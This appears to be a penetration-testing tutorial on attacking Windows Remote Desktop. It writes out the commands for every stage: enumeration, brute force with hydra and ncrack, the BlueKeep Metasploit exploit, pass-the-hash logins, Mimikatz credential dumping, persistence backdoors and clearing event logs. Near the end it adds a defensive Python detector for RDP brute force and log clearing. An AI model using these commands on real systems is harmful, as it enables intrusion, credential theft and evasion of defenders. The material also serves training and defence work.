Cracking RDP:

Remote Desktop Protocol (RDP) is a go-to service for system administrators—and a juicy target for attackers. RDP provides GUI access to a remote Windows system, but misconfigurations, weak credentials, and unpatched systems make it a serious security risk. This guide walks through discovering, enumerating, exploiting, and abusing RDP like a pro.

Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol used for remotely managing and interacting with Windows systems over a graphical interface.

  • Default Port: TCP 3389
  • Used For: Remote administration, support, and management
  • Authentication: NTLM-based, Kerberos (in domain environments), or smart card

Common weaknesses that make RDP a target:

  • Weak or default credentials
  • RDP enabled for all users
  • No Network Level Authentication (NLA)
  • Vulnerable services (e.g., BlueKeep)
  • Credential reuse or exposed creds
nmap -p 3389 -sV <target>

Detects whether RDP is listening and grabs service/version info.

nmap -p 3389 --script=rdp-ntlm-info,rdp-enum-encryption <target>

  • rdp-ntlm-info: Reveals domain info, NetBIOS names, and the OS version from the NTLM challenge
  • rdp-enum-encryption: Checks which encryption levels and security protocols (standard RDP, TLS, CredSSP/NLA) the server accepts

Once port 3389 is open, it’s time to probe further.

use auxiliary/scanner/rdp/rdp_sec_check

Metasploit module that checks for common RDP vulnerabilities and configuration issues, including whether NLA is enforced.

cme rdp <target> -u <user> -p <pass>

Tests credentials against RDP. Fast and efficient when you already have a username/password pair or NTLM hashes.

ncrack -p 3389 -U users.txt -P passwords.txt <target>

Be cautious: RDP brute-forcing is noisy and can easily trigger account lockouts in AD environments.

This is where RDP gets spicy.

Many orgs expose RDP externally or internally with poor creds. Use:

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://<target>

BlueKeep (CVE-2019-0708) is a pre-authentication remote code execution vulnerability in the RDP service of older, unpatched Windows versions.

  • Use Metasploit or community PoCs (notoriously unstable; a failed attempt can crash the target):
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Check first with:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

If you’ve found NTLM hashes or plain creds, RDP is a great way to gain GUI access.

  • Tools like xfreerdp or rdesktop let you log in from Linux:
xfreerdp /u:<user> /p:<pass> /v:<target>

With an NTLM hash (pass-the-hash; this only works if the target has Restricted Admin mode enabled):

xfreerdp /u:<user> /pth:<hash> /v:<target>

If SMB signing is disabled and NTLMv1 is in use, use Responder + ntlmrelayx to potentially get RDP logins.

Once you’ve got RDP access, treat it like being in front of the machine.

  • Copy files to/from the box using clipboard or mapped drives.
  • Dump SAM, SYSTEM, SECURITY hives using Mimikatz or reg save.

Use Mimikatz (GUI or upload a dropper):

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

If you plan on keeping access:

  • Create a new user and add to Administrators
  • Install a scheduled task for callback access
  • Backdoor mstsc.exe or drop RDP wrap tools

Delete any tools used and clear event logs if appropriate:

wevtutil cl security
wevtutil cl system

Defenders watch for exactly this: clearing the Security log writes event ID 1102 (clearing System writes event ID 104), so the clear itself is frequently the first thing a SOC notices.
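From the defender's side, the brute-force and log-clearing steps above both leave a trail in the Windows Security log. The following Python is an added example (not from the original post) that runs a simple detection over constructed event records: repeated 4625 failures with logon type 10 (RemoteInteractive, i.e. RDP) from one source, a 4624 success from that same source afterwards, and event 1102, which Windows writes when the Security log is cleared. The event IDs and logon type are real Windows values; the records, the threshold, and the helper names are constructed for the example.

```python
"""Hypothetical RDP detection helper (added example, not from the original post).

Input is a simplified list of Windows Security log records. Real event IDs:
4625 = failed logon, 4624 = successful logon, 1102 = Security log cleared.
LogonType 10 = RemoteInteractive, i.e. an RDP session.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry): five failed RDP logons from
# one IP, a success from the same IP, an unrelated network logon failure,
# and a Security log clear.
SAMPLE_EVENTS = [
    {"time": f"2024-05-01T10:00:{2 * i:02d}", "id": 4625, "logon_type": 10,
     "user": "administrator", "ip": "10.0.0.5"}
    for i in range(5)
] + [
    {"time": "2024-05-01T10:00:12", "id": 4624, "logon_type": 10,
     "user": "administrator", "ip": "10.0.0.5"},
    {"time": "2024-05-01T10:30:00", "id": 4625, "logon_type": 3,
     "user": "svc_backup", "ip": "10.0.0.9"},
    {"time": "2024-05-01T11:00:00", "id": 1102, "logon_type": None,
     "user": "administrator", "ip": None},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag a source IP once it reaches `threshold` failed RDP logons inside
    `window`, and flag again if that IP then logs in successfully over RDP."""
    failures = defaultdict(list)  # source ip -> timestamps of recent 4625s
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 10:  # only RemoteInteractive (RDP) logons
            continue
        t = datetime.fromisoformat(ev["time"])
        ip = ev["ip"]
        if ev["id"] == 4625:
            # keep only failures still inside the sliding window, then add this one
            failures[ip] = [f for f in failures[ip] if t - f <= window] + [t]
            if len(failures[ip]) == threshold:
                alerts.append(("bruteforce", ip, ev["user"]))
        elif ev["id"] == 4624 and len(failures[ip]) >= threshold:
            alerts.append(("success_after_bruteforce", ip, ev["user"]))
    return alerts


def detect_log_clearing(events):
    """Return every 1102 record: the log clear itself is the detection."""
    return [ev for ev in events if ev["id"] == 1102]
```

In production the same logic would read from a SIEM query or `Get-WinEvent` export rather than an inline list, with the threshold and window tuned to the environment's normal failure rate.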

Labs to practice on:

  • Blue – Features EternalBlue, but has RDP components.
  • Metasploit – Explores MSF usage, including BlueKeep.
  • CC: RDP Abuse – Focused practice on abusing and misconfiguring RDP (if available).

RDP is a heavyweight in Windows environments. When misconfigured or combined with leaked credentials, it becomes a golden ticket to GUI-based control of a system—and the potential to move laterally or escalate privileges quickly.

Stay quiet, stay smart, and if you’re inside, remember: screenshots are proof, but shells are king.
